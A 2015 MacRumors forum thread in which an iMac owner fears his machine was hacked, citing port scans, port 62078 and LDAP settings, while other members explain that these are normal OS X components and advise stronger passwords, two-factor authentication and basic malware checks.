HELP Hacked??

Discussion in 'iMac' started by imacdave1, Feb 1, 2015.

Thread Status:
Not open for further replies.
  1. imacdave1, Feb 1, 2015
    Last edited: Feb 1, 2015

    imacdave1 macrumors newbie

    Joined:
    Feb 1, 2015
    #1
    iMac 2013 27"

    Someone severely hacked into my imac, they had accessed every email account I used on my iMac including my FB account and my iCloud account. I deactivated my FB account 4 times only to see it reactivated by someone else. It got so bad that I took my imac to an Apple approved service repair center and had them install a new hard drive but the idiot technician transferred the data from the compromised HD to the new HD.

    According to my modem/router log I configured on the modem my system is being used to send out "TCP- or UDP-based Port Scan" or "SYN Flood" packets. How do I stop this? I have the firewall on the modem/router to high and Ive got my the firewall on my imac set up so it doesnt accept any incoming connections to programs that could be used by a hacker but the TCP- or UDP-based Port Scan or SYN Flood still exists.

    I check my system resources and it looks normal but when I run an IP scanner on my system I can see that my system is being accessed by telnet and or open ssh but yet I've never configured my system for such use.

    On my com.apple.applefileserver plist file Im supposedly using LKDC:SHA1.5488DD95F4D70CC7EE141AF1C9CC1EFBECC28819@LKDC:SHA1.5488DD95F4D70CC7EE141AF1C9CC1EFBECC28819 (Kerberos) as a server and have a hidden LDAPv3 configuration running that I knew nothing about till last night. Ive disabled the wi-fi in system preferences so now I only connect to the internet via ethernet

    I have deleted and reformated every partition on my harddrive but yet the problem still exists.

    Any suggestions would be greatly appreciated.
     
  2. chrfr macrumors 603

    Joined:
    Jul 11, 2009
    #3
    This is 100% normal. It's what OS X uses internally to manage user accounts and other aspects of the system.
     
  3. Ledgem macrumors 65816

    Ledgem

    Joined:
    Jan 18, 2008
    Location:
    Hawaii, USA
    #4
    Are you reusing passwords between accounts? How strong are your passwords? Unless you're installing pirated software or visiting sketchy websites it's more likely that someone has stolen your login credentials than that your computer has been hacked. Did you try changing your passwords?
     
  4. imacdave1 thread starter macrumors newbie

    Joined:
    Feb 1, 2015
    #5
    Somewhat, only difference is my router is showing my ip as the source and someone else is the target.

    I use a port scanning program called fing (downloaded from the Apple store) on my iphone and ipad and it shows that someone has been using port 62078 to back up my iphone. The link is http://code.google.com/p/iphone-elite/source/browse/wiki/62708.wiki. I'll use the sudo command on my imac to shut that port down. The port is associated with a program on my computer called lockdownd but I cant seem to locate it so I can either delete it or put it in my firewall and disable it from receiving any incoming messages

    I've changed my passwords literally hundreds of times but now their more complex using symbols, numbers and letters. Because of all the problems this has caused and the money I've spent to put this crap to a stop Im very careful about the web sites I go to and only download from the apple store.
     
  5. Natzoo macrumors 65816

    Natzoo

    Joined:
    Sep 16, 2014
    Location:
    Not sure where i am
    #6
    I feel like you should go to the police, and maybe get in touch with some nice investigation agency.
     
  6. imacdave1 thread starter macrumors newbie

    Joined:
    Feb 1, 2015
    #7
    Been there done that.

    The police wont get involved till there's been money taken even than they drag their feet. Because they had taken complete control of my iMac the hackers could hear me and see everything that I was doing while I was in front of the computers camera.

    Calling Apple is pointless, they'll only tell you to wipe your hard drive and start out fresh. What they fail to realize is there's an EFI partition (fat32) that contains the computers OS that doesn't get deleted even though you've formatted the hard drive. I had to get creative and figure out how to delete that partition to an avail.

    The way I see it is third party software in the form of a firewall and a malware scanner that works. I could definitely use more suggestions.
     
  7. GGJstudios macrumors Westmere

    GGJstudios

    Joined:
    May 16, 2008
    #8
    Your Mac was not hacked. In over 7 years of reading "My Mac was hacked!" claims in this forum and elsewhere, not a single one ever was hacked. You can safely put that possibility out of your mind and move on to basic troubleshooting.

    Email and Facebook accounts can be compromised even if you don't own a computer. Change all of your online passwords again, including all email accounts. Make sure the new passwords are long and complex, so they're more difficult to guess.

    Launch Activity Monitor and make note of all processes running. You can post a screen capture here or simply report any processes you don't recognize.

    You can check the following locations for apps that automatically launch on startup and delete any you don't need/want:
    • System Preferences > Users & Groups > yourusername > Login Items (SL and older: System Preferences > Accounts > yourusername > Login Items)
    • In Finder, click Go > Go to Folder > /Library/LaunchAgents
    • In Finder, click Go > Go to Folder > ~/Library/LaunchAgents
    • In Finder, click Go > Go to Folder > /Library/StartupItems
    After you delete items from the list, restart your Mac and those processes should not be running.

    If you think you may have installed a Trojan, install ClamXAV and run a complete system scan. Your router's firewall and the firewall included with OS X should be sufficient. You don't need to install a 3rd party firewall.
     
  8. Ledgem macrumors 65816

    Ledgem

    Joined:
    Jan 18, 2008
    Location:
    Hawaii, USA
    #9
    Unless you're thinking that someone malicious had physical access to your computer, it's very unlikely that the EFI or recovery partition have been tampered with.
     
  9. Chippy99 macrumors 6502a

    Joined:
    Apr 28, 2012
    #10
    And even then, unlikely. Unless you live in Russia and have been saying bad things about Putin, I think you can rule that out.
     
  10. imacdave1 thread starter macrumors newbie

    Joined:
    Feb 1, 2015
    #11
    Thanks for replying, I checked all the folders that have been suggested and they all looked ok. I came across a file concerning a hidden LDAPv3 connection that I knew nothing about, it reads as follows it has a hidden registration, locked, AppleODC client, it uses DNS replicas and a "altServer replica". I wasnt aware of an alternate server being installed on my hard drive, that being said is this a legitimate file?

    When I go to system preferences>users&groups>login items>Network Account Server>Join>Open Directory Utility> click on LDAPv3 the only option I have is to make a new account.
     
  11. chrfr macrumors 603

    Joined:
    Jul 11, 2009
    #12
    Yes, this is all totally normal. As I said, it's how OS X manages user accounts, even if there's only one user account on the computer.
     
  12. imacdave1 thread starter macrumors newbie

    Joined:
    Feb 1, 2015
    #13
    Maybe your right and Im just gun shy right now. Im still trying to understand how the port scanner detected my iphone using port 62078 and was backed up. I just googled port 62078 hack on, heres what I came up with

    https://www.google.com/search?q=port+62078+exploit&ie=utf-8&oe=utf-8
     
  13. chrfr macrumors 603

    Joined:
    Jul 11, 2009
    #14
    Your searches are making you unnecessarily paranoid. Port 62078 is how the phone connects to iTunes for wifi sync. While it may be possible to exploit that port, again, you're not seeing any evidence at all that this is actually happening.
    I assume that you have secured your wifi network at home with a WPA2 password. If not, you should do that right away, even if your computer is connected to that network over ethernet.
    Every month or two a new poster comes on the forum stating that their Mac has been "hacked." There has never been actual evidence that this is the case. It's all but certain that your email/Facebook/whatever accounts were compromised by a bad password or passwords somewhere rather than a hack on your specific Mac.
    Where you should be focusing your attention is on your accounts themselves. Implement 2-factor authentication where possible, and where it's not possible, be sure you're using strong and unique passwords for each account.
     
Thread Status:
Not open for further replies.

Share This Page